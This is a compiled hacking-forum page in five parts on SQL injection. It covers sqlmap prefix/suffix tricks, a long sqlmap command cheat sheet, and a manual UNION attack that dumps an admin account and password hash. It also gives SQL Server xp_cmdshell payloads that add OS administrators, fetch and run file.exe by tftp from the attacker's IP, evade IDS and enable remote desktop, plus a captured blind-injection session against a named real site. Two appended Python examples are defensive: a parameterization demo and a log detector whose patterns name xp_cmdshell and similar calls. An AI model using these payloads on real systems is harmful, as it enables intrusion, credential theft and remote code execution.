Custom sqlmap injection statements for advanced injection (script security)
Part 1: Custom sqlmap injection statements for advanced injection (script security)
There are more and more tools that can help us detect SQL injection, but in my view the most versatile is still sqlmap; other tools fall far short of it in flexibility. There are many types of SQL injection, and my favourite is of course the kind that allows a UNION query, which is far more satisfying than the blind type.
Suppose we have a URL already known to contain a SQL injection vulnerability. We feed it to sqlmap and run it, with this result:
sqlmap -u "www.ooxx.com/ooxx.php?xid=93&dxxx=news&action=find&ppid=2" -p ppid
Obviously these are rather unpleasant injection types, blind and error-based. Do we just have to take the tool's word for it? Let's take a look by hand. The SQL error is as follows:
MySQL Error
Message: MySQL Query Error
SQL: select ..... and pass=0 and (c.catid=2\' or c.parentid=2\') and subject like '%%'
Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' or c.parentid=2\') and subject like '%%'' at line 4
Errno.: 1064
Click here to seek help.
The error shows that the SQL statement here is somewhat complex and not of the usual type: we need to close the parenthesis and preferably comment out the trailing LIKE clause. Let's construct it:
www.ooxx.com/ooxx.php?xid=93&dxxx=news&action=find&ppid=2) order by 15 --
www.ooxx.com/ooxx.php?xid=93&dxxx=news&action=find&ppid=2) order by 16 --
ORDER BY confirms that the query returns 16 columns in total, so let's keep going:
www.ooxx.com/ooxx.php?xid=93&dxxx=news&action=find&ppid=2) and 1=2 union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15 --
After confirming by hand, we go back to sqlmap to continue. We need two sqlmap options, --suffix and --prefix, which add a prefix and a suffix to the injected statement:
sqlmap -u "www.ooxx.com/ooxx.php?xid=93&dxxx=news&action=find&ppid=2" -p catid --suffix=" -- " --prefix=")"
The injected statement has been customised successfully, and a UNION-type injection appears.
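As an added example (not from the original write-up), the Python script below rebuilds the query shape exposed by the MySQL error above in an in-memory SQLite database: it shows why the bare payload fails to parse, why the ")" prefix and " -- " suffix make it parse, and why the same input bound as a parameter returns no UNION row. The table "c", its rows and the query template are constructed for this demonstration; SQLite stands in for MySQL because it also treats "--" as a line comment.

```python
"""Why the prefix ")" and suffix " -- " from this write-up make the injected
text parse, and why a bound parameter does not.

Added example, not from the original article. The schema and the query
template are constructed to match the shape revealed by the page's MySQL
error (pass=0, (c.catid=N or c.parentid=N), subject like '%%'); sqlite3 is
used in place of MySQL because it ships with Python and also treats "--" as
a line comment.
"""
import sqlite3


def demo_db():
    """Constructed demo table: one public row in category 2, one hidden row."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE c (id INTEGER, catid INTEGER, parentid INTEGER,
                        pass INTEGER, subject TEXT);
        INSERT INTO c VALUES (1, 2, 0, 0, 'public notice');
        INSERT INTO c VALUES (2, 5, 2, 1, 'hidden draft');
        """
    )
    return conn


def build_vulnerable_sql(ppid, keyword=""):
    """String concatenation of the kind the error message on the page exposes.
    ppid is spliced in twice; everything after the first '--' (including the
    second copy and the LIKE clause) becomes comment, which is what lets the
    prefix/suffix recover valid syntax."""
    return (
        "select id, subject from c where pass=0 "
        f"and (c.catid={ppid} or c.parentid={ppid}) "
        f"and subject like '%{keyword}%'"
    )


def wrap_payload(value, payload, prefix=")", suffix=" -- "):
    """What sqlmap's --prefix/--suffix do: glue prefix, test payload and
    suffix onto the original parameter value."""
    return f"{value}{prefix} {payload}{suffix}"


def run_vulnerable(conn, ppid):
    return conn.execute(build_vulnerable_sql(ppid)).fetchall()


def query_parses(conn, ppid):
    """True if the concatenated statement is syntactically valid."""
    try:
        run_vulnerable(conn, ppid)
        return True
    except sqlite3.OperationalError:
        return False


def run_parameterized(conn, ppid, keyword=""):
    """The fix: the value is bound, never spliced into the statement text, so
    the prefix and suffix are just characters in a value that matches no row."""
    sql = ("select id, subject from c where pass=0 "
           "and (c.catid=? or c.parentid=?) and subject like ?")
    return conn.execute(sql, (ppid, ppid, f"%{keyword}%")).fetchall()


def main():
    conn = demo_db()
    print("plain value:", run_vulnerable(conn, "2"))
    print("bare payload parses:", query_parses(conn, "2 and 1=2 union select 1,2"))
    injected = wrap_payload("2", "and 1=2 union select 1,2")
    print("final SQL:", build_vulnerable_sql(injected))
    print("with prefix/suffix:", run_vulnerable(conn, injected))
    print("same input, bound parameter:", run_parameterized(conn, injected))


if __name__ == "__main__":
    main()
```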
Part 2: sqlmap injection commands (script security)
The tool used is sqlmap version 0.9.
Get database names
./sqlmap.py -u "www.xx.php?nid=14550" --user-agent "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" --dbs
Get table names
./sqlmap.py -u "www.xxx.php?nid=14550" --user-agent "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" -D database --tables
Get column names
./sqlmap.py -u "www.xxx.php?nid=14550" --user-agent "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" -D database -T cdb_adminactions --columns
Get values
./sqlmap.py -u "www.xxx.php?nid=14550" --user-agent "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" -D database -T cdb_members -C username,password --dump
Update
svn checkout svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-dev
sqlmap.py -u "www.islamichina.com/hotelinchina.asp?cityid=2&m=1" -v 1 --sql-shell  // run SQL statements
sqlmap.py -u "www.islamichina.com/hotelinchina.asp?cityid=2&m=1" -v 5  // more verbose output
Load options from a configuration INI file
sqlmap -c sqlmap.conf
Submit with the POST method
sqlmap.py -u "www.myhack58.com/sqlmap/oracle/post_int.php" --method POST --data "id=1"
Submit via cookies; cookie values are separated with ";" and can be captured with TamperData
python sqlmap.py -u "www.myhack58.com/sqlmap/mssql/cookie_int.php" --cookie "id=1" -v 1
Spoof the Referer
python sqlmap.py -u "www.myhack58.com/sqlmap/pgsql/get_int.php?id=1" --referer "www.google.com" -v 3
Use a custom User-Agent, or pick one at random from the bundled user-agents.txt
python sqlmap.py -u "www.myhack58.com/sqlmap/oracle/get_int.php?id=1" --user-agent "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" -v 3
python sqlmap.py -u "www.myhack58.com/sqlmap/mysql/get_int.php?id=1" -v 1 -a "./txt/user-agents.txt"
Use HTTP Basic authentication
python sqlmap.py -u "www.myhack58.com/sqlmap/mysql/basic/get_int.php?id=1" --auth-type Basic --auth-cred "testuser:testpass" -v 3
Use Digest authentication
python sqlmap.py -u "www.myhack58.com/sqlmap/mysql/digest/get_int.php?id=1" --auth-type Digest --auth-cred "testuser:testpass" -v 3
Use a proxy, for example together with Tor
python sqlmap.py -u "www.myhack58.com/sqlmap/pgsql/get_int.php?id=1" --proxy "192.168.1.47:3128"
python sqlmap.py -u "www.myhack58.com/sqlmap/pgsql/get_int.php?id=1" --proxy "192.168.1.47:8118"
Use multiple threads for guessing
python sqlmap.py -u "www.myhack58.com/sqlmap/mysql/get_int.php?id=1" -v 1 --current-user --threads 3
Skip dynamic-parameter detection and name the injectable parameter directly; several parameters can be separated with commas, and the User-Agent can be given as the injection point
python sqlmap.py -u "www.myhack58.com/sqlmap/pgsql/get_int.php?id=1" -v 1 -p "id"
python sqlmap.py -u "www.myhack58.com/sqlmap/pgsql/get_int.php?id=1&cat=2" -v 1 -p "cat,id"
python sqlmap.py -u "www.myhack58.com/sqlmap/mysql/ua_str.php" -v 1 -p "user-agent" --user-agent "sqlmap/0.7rc1 (sqlmap.sourceforge.net)"
Specify the DBMS to skip sqlmap's automatic detection
python sqlmap.py -u "www.myhack58.com/sqlmap/pgsql/get_int.php?id=1" -v 2 --dbms "PostgreSQL"
* MySQL
* Oracle
* PostgreSQL
* Microsoft SQL Server
Specify the operating system to skip sqlmap's automatic detection
python sqlmap.py -u "www.myhack58.com/sqlmap/pgsql/get_int.php?id=1" -v 2 --os "Windows"
* Linux
* Windows
Custom payload
Options: --prefix and --postfix
In some circumstances the vulnerable parameter is exploitable only if the user provides a postfix to be appended to the injection payload. Another scenario where these options come in handy is when the user already knows the query syntax and wants to detect and exploit the SQL injection by directly providing an injection payload prefix and/or postfix.
Example on a MySQL 5.0.67 target on a page where the SQL query is: $query = "SELECT * FROM users WHERE id=('" . $_GET['id'] . "') LIMIT 0, 1";
$ python sqlmap.py -u "www.myhack58.com/sqlmap/mysql/get_str_brackets.php?id=1" -v 3 -p "id" --prefix "'" --postfix "AND 'test'='test"
[...]
[hh:mm:16] [INFO] testing sql injection on GET parameter 'id' with 0 parenthesis
[hh:mm:16] [INFO] testing custom injection on GET parameter 'id'
[hh:mm:16] [TRAFFIC OUT] HTTP request:
GET /sqlmap/mysql/get_str_brackets.php?id=1%27%29%20AND%207433=7433%20AND%20%28%27test%27=%27test HTTP/1.1
Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
Host: www.myhack58.com:80
Accept-language: en-us,en;q=0.5
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-agent: sqlmap/0.7rc1 (sqlmap.sourceforge.net)
Connection: close
[...]
[hh:mm:17] [INFO] GET parameter 'id' is custom injectable
[...]
As you can see, the injection payload for testing for custom injection is:
id=1%27%29%20AND%207433=7433%20AND%20%28%27test%27=%27test
which URL decoded is:
id=1') AND 7433=7433 AND ('test'='test
and makes the query syntactically correct to the page query:
SELECT * FROM users WHERE id=('1') AND 7433=7433 AND ('test'='test') LIMIT 0, 1
In this simple example, sqlmap could detect the SQL injection and exploit it without the need to provide a custom injection payload, but sometimes in real-world applications it is necessary to provide it.
Page comparison
python sqlmap.py -u "www.myhack58.com/sqlmap/mysql/get_int_refresh.php?id=1" --string "luther" -v 1
python sqlmap.py -u "www.myhack58.com/sqlmap/mysql/get_int_refresh.php?id=1" --regexp "lu[\w][\w]er" -v 1
Exclude dynamic content of the site from the comparison
python sqlmap.py -u "www.myhack58.com/sqlmap/mysql/get_int_refresh.php?id=1" --excl-reg "Dynamic content: ([\d]+)"
Stacked-query test; PHP's built-in mysql_query() does not support multiple statements
python sqlmap.py -u "www.myhack58.com/sqlmap/mysql/get_int.php?id=1" --stacked-test -v 1
UNION injection test
python sqlmap.py -u "www.myhack58.com/sqlmap/oracle/get_int.php?id=1" --union-test -v 1
UNION injection using the ORDER BY technique
python sqlmap.py -u "www.myhack58.com/sqlmap/pgsql/get_str.php?id=1" --union-test --union-tech orderby -v 1
python sqlmap.py -u "www.myhack58.com/sqlmap/mssql/get_int.php?id=1" -v 1 --union-use --banner
python sqlmap.py -u "www.myhack58.com/sqlmap/mysql/get_int.php?id=1" -v 5 --union-use --current-user
python sqlmap.py -u "www.myhack58.com/sqlmap/mysql/get_int_partialunion.php?id=1" -v 1 --union-use --dbs
Fingerprint
python sqlmap.py -u "www.myhack58.com/sqlmap/mssql/get_int.php?id=1" -v 1 -f
python sqlmap.py -u "192.168.123.36/sqlmap/get_str.asp?name=luther" -v 1 -f -b
Check whether the current user is a DBA
python sqlmap.py -u "www.myhack58.com/sqlmap/pgsql/get_int.php?id=1" --is-dba -v 1
Enumerate database users
python sqlmap.py -u "www.myhack58.com/sqlmap/pgsql/get_int.php?id=1" --users -v 0
Enumerate database user passwords
python sqlmap.py -u "www.myhack58.com/sqlmap/mysql/get_int.php?id=1" --passwords -v 0
python sqlmap.py -u "www.myhack58.com/sqlmap/mssql/get_int.php?id=1" --passwords -U sa -v 0
View user privileges
python sqlmap.py -u "www.myhack58.com/sqlmap/oracle/get_int.php?id=1" --privileges -v 0
python sqlmap.py -u "www.myhack58.com/sqlmap/pgsql/get_int.php?id=1" --privileges -U postgres -v 0
List databases
python sqlmap.py -u "www.myhack58.com/sqlmap/mssql/get_int.php?id=1" --dbs -v 0
List the columns of a given table in a given database
python sqlmap.py -u "www.myhack58.com/sqlmap/mysql/get_int.php?id=1" --columns -T users -D test -v 1
Dump the contents of a given column of a given table in a given database
python sqlmap.py -u "www.myhack58.com/sqlmap/mssql/get_int.php?id=1" --dump -T users -D master -C surname -v 0
Restrict the dump to entries 2 to 4
python sqlmap.py -u "www.myhack58.com/sqlmap/mysql/get_int.php?id=1" --dump -T users -D test --start 2 --stop 4 -v 0
Dump the contents of all tables in all databases
python sqlmap.py -u "www.myhack58.com/sqlmap/mysql/get_int.php?id=1" --dump-all -v 0
Dump only the contents of user-created databases and tables
python sqlmap.py -u "www.myhack58.com/sqlmap/mssql/get_int.php?id=1" --dump-all --exclude-sysdbs -v 0
SQL query
python sqlmap.py -u "www.myhack58.com/sqlmap/pgsql/get_int.php?id=1" --sql-query "SELECT usename FROM pg_user" -v 0
python sqlmap.py -u "www.myhack58.com/sqlmap/mysql/get_int.php?id=1" --sql-query "SELECT host, password FROM mysql.user LIMIT 1, 3" -v 1
SELECT usename, passwd FROM pg_shadow ORDER BY usename
Save and restore a session
python sqlmap.py -u "www.myhack58.com/sqlmap/pgsql/get_int.php?id=1" -b -v 1 -s "sqlmap.log"
Save options to an INI configuration file
python sqlmap.py -u "www.myhack58.com/sqlmap/pgsql/get_int.php?id=1" -b -v 1 --save
Source: 影子
Part 3: Constructing an injection with a UNION statement (PHP script security)
This article is not very technical, but it is still worth a read for beginners. Experts, please don't throw bricks ^_^
Full text
Original article: www.tkbbs.com/Article/wlaq/hkgf/10/856.html
Reference article: Efficient injection with UNION
It started while I was using the webshell manager in HDSI: one site was reported as SQL-injectable, so I got interested and ran the tool against it, but of course it could not find the admin account and the tool was useless, haha. So I started injecting by hand.
Injection URL: www.XXX.net/read.php?type=news&id=29
www.xxxx.net/read.php?type=news&id=29/**/and/**/1=2/**/union/**/select/**/1,2,3,4,5,6,7/**/from/**/admin
The string above queries the number of columns in the ADMIN table; the number can be increased one at a time until the page stops reporting an error. We can then see 2 and 4 appear on the page, and 3 after the author field.
This shows the program is displaying those positions, as in Figure 1.
So replace the 2, 3 and 4 above with count(id) (how many administrators there are), min(id) (the smallest administrator account ID) and max(id) (the largest administrator account ID),
giving the following statement:
www.xxxx.net/read.php?type=news&id=29/**/and/**/1=2/**/union/**/select/**/1,count(id),min(id),max(id),5,6,7/**/from/**/admin
See Figure 2.
Where 2 was displayed we now see 2, where 4 was displayed we see 2, and where 3 was displayed we see 1: the largest administrator ID is 2, the smallest is 1, and there are two administrators in total.
Next we query the administrator's account name, password and ID:
username password id
Replace the 2, 3 and 4 above with username, password and id respectively. If nothing comes out at this step, try other names for these fields.
www.xxxx.net/read.php?type=news&id=29/**/and/**/1=2/**/union/**/select/**/1,username,password,1,5,6,7/**/from/**/admin
或 www.xxxx.net/read.php?type=news&id=29/**/and/**/1=2/**/union/**/select/**/1,username,password,2,5,6,7/**/from/**/admin
See Figure 3.
See that? The administrator with ID 1 has the account wnjy and the password $1$BX$/.kw1RvBf/Un7c9heGMPb0
That's it for this article; I hope beginners get something out of it. Incidentally, the 动力 system before version 3.51 seems to have this vulnerability too, and the statements are constructed in much the same way. BY 风雪残士
Part 4: 桂林老兵's advanced SQL Server injection techniques (script security)
I now present to the friends who support me the advanced SQL Server injection techniques I have accumulated over many years:
Foreword:
Since these are advanced techniques, the basic injection methods are not described in detail;
if anything is unclear, consult this site's articles on injection basics.
To make the most of injection, I recommend reading this site's articles on SQL syntax.
[Get all database names]
select name from master.dbo.sysdatabases where dbid=7  // dbid values of 7 and above are user databases
[Get table names] [Update a field's value to the table name, then find a way to read that field back to obtain the table name]
select top 1 name from <database>.dbo.sysobjects where xtype='u' and status>0 and name not in('table')
[Get table column names] [Update a field's value to the column name, then read that field back to obtain the column name]
select top 1 <database>.dbo.col_name(object_id('<table to query>'), <column ordinal, e.g. 1>) [where <condition>]
Creating a database administrator account and a system administrator account through a SQL Server injection vulnerability [the current account must be in the SYSADMIN group]
news.asp?id=2;exec master.dbo.sp_addlogin test,test;--  // add database user test with password test
news.asp?id=2;exec master.dbo.sp_password test,123456,test;--  // to change the password, use this (changes test's password to 123456)
news.asp?id=2;exec master.dbo.sp_addsrvrolemember test,sysadmin;--  // add test to the sysadmin group, whose members can perform any operation
news.asp?id=2;exec master.dbo.xp_cmdshell 'net user test test /add';--  // add system user test with password test
news.asp?id=2;exec master.dbo.xp_cmdshell 'net localgroup administrators test /add';--  // promote system user test to administrator
This leaves a test administrator account in both the database and the operating system.
Next, how to download file.exe from your server and run it [you must first set up your machine as a TFTP server with port 69 open]
id=2; exec master.dbo.xp_cmdshell 'tftp Ci <your IP> get file.exe';--
Then run the file:
id=2; exec master.dbo.xp_cmdshell 'file.exe';--
Download the server's file file2.doc to the local TFTP server [the file must exist]:
id=2; exec master.dbo.xp_cmdshell 'tftp Ci <your IP> Put file2.doc';--
Evading IDS detection [using variables]
declare @a sysname set @a='xp_'+'cmdshell' exec @a 'dir c:\'
declare @a sysname set @a='xp'+'_cm'+'dshell' exec @a 'dir c:\'
New:
Create a table with a single column of type image, write the ASP content into it, then export the database to a file:
backup database dbname to disk='d:\web\db.asp';
Obtain the operating system and database version from an error message
id=2 and 1=(select @@VERSION);
Part 5: hdsi 2.0 SQL injection, packet-capture analysis of the statements (script security)
Restore cmd
;insert tb1 exec master..xp_cmdshell'net user '--
;exec master.dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll'--
Execute a command:
sql: ;ipconfig -all--
dos:
;Drop table comd_list ;CREATE TABLE comd_list (ComResult nvarchar(1000)) INSERT comd_list EXEC MASTER..xp_cmdshell "ipconfig -all"--
GET /plaza/event/new/crnt_event_view.asp?event_id=57
And (Select char(94)+Cast(Count(1) as varchar(8000))+char(94) From [comd_list] Where 1=1)>0
List a directory:
c:  jiaozhu (temporary table)
;drop table jiaozhu;CREATE TABLE jiaozhu(DirName VARCHAR(100), DirAtt VARCHAR(100),DirFile VARCHAR(100)) INSERT jiaozhu EXEC MASTER..XP_dirtree "c:",1,1--
GET /plaza/event/new/crnt_event_view.asp?event_id=57
And (Select char(94)+Cast(Count(1) as varchar(8000))+char(94) From [jiaozhu] Where 1=1)>0
Upload a file:
Local path: C:\Inetpub\wwwroot\cook.txt  Destination: c:
Database stored procedure:
;exec master..xp_cmdshell ' echo cdb_sid=3UrzOV;%20cdb_cookietime=2592000;%20cdb_auth=VgcCBAJbVQxVAVMCVghTBFJUUQYDBQdTV1BWVQoKAQE6PwNX;%20cdb_visitedfid=12;%20cdb_oldtopics=D8D>c:\'--
Database backup (delete the temporary table after uploading):
;Drop table [xiaopan];create table [dbo].[xiaopan] ([cmd] [text])--
;insert into xiaopan(cmd) values(' echoStr ')--
;declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s='c:/' backup database @a to disk=@s WITH DIFFERENTIAL,FORMAT--
;Drop table [xiaopan]--
Enable 3389:
;declare @r varchar(255) set @r='hkey_local_machine'exec master..xp_regwrite @r,'software\microsoft\windows\currentversion\netcache','enable','reg_sz','0';----
;declare @r varchar(255) set @r='hkey_local_machine'exec master..xp_regwrite @r,'software\microsoft\windows nt\currentversion\winlogon','shutdownwithoutlogon','reg_sz','0';----
;declare @r varchar(255) set @r='hkey_local_machine'exec master..xp_regwrite @r,'software\policies\microsoft\windows\installer','enableadmintsremote','reg_dword',1;----
;declare @r varchar(255) set @r='hkey_local_machine'exec master..xp_regwrite @r,'system\currentcontrolset\control\terminal servert','senabled','reg_dword',1;----
;declare @r varchar(255) set @r='hkey_local_machine'exec master..xp_regwrite @r,'system\currentcontrolset\services\termdd','start','reg_dword',2;----
;declare @r varchar(255) set @r='hkey_local_machine'exec master..xp_regwrite @r,'system\currentcontrolset\services\termservice','start','reg_dword',2;----
;declare @r varchar(255) set @r='hkey_local_machine'exec master..xp_regwrite 'hkey_users','.default\keyboard layout\toggle','hotkey','reg_sz','1';----
;declare @r varchar(255) set @r='hkey_local_machine'exec master..xp_cmdshell 'iisreset /reboot';----
Injection analysis: numeric type; SQL error messages disabled; enabled; access
Keyword used: 宝石公园“你玩 我抽”中奖名单公布
igame.sina.com.cn/plaza/event/new/crnt_event_view.asp?event_id=57
Multi-statement queries: supported
Subqueries: supported
Privileges: public
Current user: dbo
Current database: event
;create table t_jiaozhu(jiaozhu varchar(200))
And 1=1
And 1=2
And (Select Count(1) from SYSObjects)>0
and (select len(user))<32
;declare @a int--
And (IS_SRVROLEMEMBER('sysadmin'))=1
And (IS_MEMBER('db_owner'))=1
and (select len(user))<16
and (select len(user))<4
and (select len(user))<2
and (select len(user))<3
and (select len(user))<3
and (select len(user))<4
and (select ascii(substring(user,1,1)))<80
and (select ascii(substring(user,2,1)))<80
and (select ascii(substring(user,3,1)))<80
and (select ascii(substring(user,1,1)))<104
and (select ascii(substring(user,2,1)))<104
and (select ascii(substring(user,3,1)))<104
and (select ascii(substring(user,1,1)))<92
and (select ascii(substring(user,2,1)))<92
and (select ascii(substring(user,3,1)))<116
and (select ascii(substring(user,1,1)))<98
...
...
...
and (select len(db_name()))<16
and (select len(db_name()))<8
and (select len(db_name()))<4
...
...
...
and (select ascii(substring(db_name(),1,1)))<80
and (select ascii(substring(db_name(),2,1)))<80
and (select ascii(substring(db_name(),5,1)))<85
Cross-database:
Guessing database names:
GET
and (Select top 1 len(name) from (Select top 2 dbid,name from [master]..[sysdatabases] ) T order by dbid desc) <8
and (Select top 1 len(name) from (Select top 2 dbid,name from [master]..[sysdatabases] ) T order by dbid desc) <4
and (Select top 1 len(name) from (Select top 2 dbid,name from [master]..[sysdatabases] ) T order by dbid desc) <6
and (Select top 1 len(name) from (Select top 2 dbid,name from [master]..[sysdatabases] ) T order by dbid desc) <7
...
...
...
and (Select top 1 ascii(substring(name,2,1)) from (Select top 2 dbid,name from [master]..[sysdatabases] ) T order by dbid desc) <104
and (Select top 1 ascii(substring(name,3,1)) from (Select top 2 dbid,name from [master]..[sysdatabases] ) T order by dbid desc) <104
...
...
...
and (Select top 1 len(name) from (Select top 4 dbid,name from [master]..[sysdatabases] ) T order by dbid desc) <5
master: no sa privileges, so cross-database access is not possible
Guessing table names:
EventCategory
GET
and (Select top 1 unicode(substring(name,2,1)) from(Select top 1 id,name from [EVENT]..sysobjects where xtype=char(85)) T order by id desc) < 80
and (Select top 1 unicode(substring(name,11,1)) from(Select top 1 id,name from [EVENT]..sysobjects where xtype=char(85)) T order by id desc) < 80
and (Select top 1 unicode(substring(name,12,1)) from(Select top 1 id,name from [EVENT]..sysobjects where xtype=char(85)) T order by id desc) < 80
and (Select top 1 unicode(substring(name,6,1)) from(Select top 1 id,name from [EVENT]..sysobjects where xtype=char(85)) T order by id desc) < 80
Guessing column names:
GET
and (select count(1) from EVENT..syscolumns A,EVENT..sysobjects B where A.id=B.id and B.name='EventCategory')<32
and (select count(1) from EVENT..syscolumns A,EVENT..sysobjects B where A.id=B.id and B.name='EventCategory')<48
and (select count(1) from EVENT..syscolumns A,EVENT..sysobjects B where A.id=B.id and B.name='EventCategory')<56
and (select count(1) from EVENT..syscolumns A,EVENT..sysobjects B where A.id=B.id and B.name='EventCategory')<60
and (select count(1) from EVENT..syscolumns A,EVENT..sysobjects B where A.id=B.id and B.name='EventCategory')<62
and (select top 1 len(name) from ( select top 1 A.id,A.name from EVENT..syscolumns A,EVENT..sysobjects B where A.id=B.id and B.name='EventCategory' order by A.name desc) T order by name asc )<35
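As an added example, not part of any of the five articles, the Python triage script below flags in web-server access logs the request patterns these articles show: sqlmap's prefix/postfix check from Part 2 (the AND 7433=7433 tautology and the sqlmap User-Agent), the /**/union/**/select form from Part 3, the stacked xp_cmdshell and sp_addsrvrolemember calls from Part 4, and the ascii(substring(...))<N and len(...)<N blind probes from Part 5. The log lines and client addresses are constructed for the demonstration, and the combined log format is assumed.

```python
"""Triage web access logs for the injection patterns shown on this page.

Added example, not from the original articles. Log lines below are
constructed in Apache/IIS combined format; client addresses come from the
192.0.2.0/24 documentation range.
"""
import re
from collections import Counter
from urllib.parse import unquote_plus

# Each rule runs over the URL-decoded, lower-cased request path + query string.
RULES = [
    # Part 2: sqlmap's prefix/postfix check  ') AND 7433=7433 AND ('test'='test
    ("tautology_probe", re.compile(r"\band\s+(\d+)\s*=\s*\1\b")),
    # Part 1: column counting with a trailing comment   2) order by 16 --
    ("order_by_probe", re.compile(r"\border\s+by\s+\d+\s*--")),
    # Parts 1/3: UNION SELECT with numbered placeholder columns (spaces or /**/)
    ("union_select", re.compile(r"\bunion(\s|/\*\*/)+(all(\s|/\*\*/)+)?select(\s|/\*\*/)+\d")),
    # Part 3: /**/ standing in for whitespace
    ("comment_spacing", re.compile(r"/\*\*/")),
    # Parts 4/5: a second statement after ';' inside one parameter
    ("stacked_query", re.compile(r";\s*(exec|declare|drop|create|insert|backup)\b")),
    # Parts 4/5: SQL Server extended procedures and role changes
    ("xp_extended_proc", re.compile(r"\bxp_(cmdshell|regwrite|dirtree)\b")),
    ("role_escalation", re.compile(r"\bsp_(addsrvrolemember|addlogin|addextendedproc)\b")),
    # Part 5: character-at-a-time and length blind probes
    ("blind_char_probe", re.compile(r"\b(ascii|unicode)\(substring\(")),
    ("blind_len_probe", re.compile(r"\blen\(.{1,40}\)\s*<\s*\d+")),
]
SCANNER_UA = re.compile(r"\bsqlmap\b", re.I)

# Combined log format: ip ident user [time] "METHOD path PROTO" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)


def analyze(line):
    """Return {'ip', 'path', 'hits'} for one log line, or None if it does not parse.
    Decoding before matching matters: the payloads in Part 2 and Part 5 arrive
    percent-encoded (%27%29 for '), %3C for <)."""
    m = LOG_RE.match(line)
    if not m:
        return None
    decoded = unquote_plus(m["path"]).lower()
    hits = [label for label, rx in RULES if rx.search(decoded)]
    if SCANNER_UA.search(m["ua"]):
        hits.append("scanner_user_agent")
    return {"ip": m["ip"], "path": m["path"], "hits": hits}


def triage(lines):
    """Return (flagged requests, flagged-request count per client IP).
    Dozens of single-character probes from one address, as in Part 5's
    capture, show up here as a high per-IP count."""
    findings, per_ip = [], Counter()
    for line in lines:
        r = analyze(line)
        if r and r["hits"]:
            findings.append(r)
            per_ip[r["ip"]] += 1
    return findings, per_ip


# Constructed sample log: one request per article pattern plus two benign ones.
SAMPLE_LOG = """\
192.0.2.10 - - [10/Oct/2010:13:55:36 +0000] "GET /sqlmap/mysql/get_str_brackets.php?id=1%27%29%20AND%207433=7433%20AND%20%28%27test%27=%27test HTTP/1.1" 200 512 "-" "sqlmap/0.7rc1 (sqlmap.sourceforge.net)"
192.0.2.11 - - [10/Oct/2010:13:56:01 +0000] "GET /read.php?type=news&id=29/**/and/**/1=2/**/union/**/select/**/1,2,3,4,5,6,7/**/from/**/admin HTTP/1.1" 200 2048 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2)"
192.0.2.12 - - [10/Oct/2010:13:57:12 +0000] "GET /news.asp?id=2;exec%20master.dbo.sp_addsrvrolemember%20test,sysadmin;-- HTTP/1.1" 500 311 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
192.0.2.13 - - [10/Oct/2010:13:58:03 +0000] "GET /plaza/event/new/crnt_event_view.asp?event_id=57%20and%20(select%20ascii(substring(user,1,1)))%3C80 HTTP/1.1" 200 9120 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
192.0.2.13 - - [10/Oct/2010:13:58:04 +0000] "GET /plaza/event/new/crnt_event_view.asp?event_id=57%20and%20(select%20ascii(substring(user,1,1)))%3C104 HTTP/1.1" 200 9120 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
192.0.2.13 - - [10/Oct/2010:13:58:05 +0000] "GET /plaza/event/new/crnt_event_view.asp?event_id=57%20and%20(select%20len(db_name()))%3C16 HTTP/1.1" 200 9120 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
192.0.2.20 - - [10/Oct/2010:13:59:00 +0000] "GET /read.php?type=news&id=29 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
192.0.2.21 - - [10/Oct/2010:13:59:30 +0000] "GET /search.php?q=credit+union+select+a+branch HTTP/1.1" 200 1500 "-" "Mozilla/5.0"
"""


def main():
    findings, per_ip = triage(SAMPLE_LOG.splitlines())
    for f in findings:
        print(f["ip"], ",".join(f["hits"]), f["path"][:60])
    print("flagged requests per client:", dict(per_ip))


if __name__ == "__main__":
    main()
```

The last benign line ("credit union select a branch") is why the UNION rule insists on a digit after SELECT: the articles' payloads enumerate columns as 1,2,3,..., and plain English text does not.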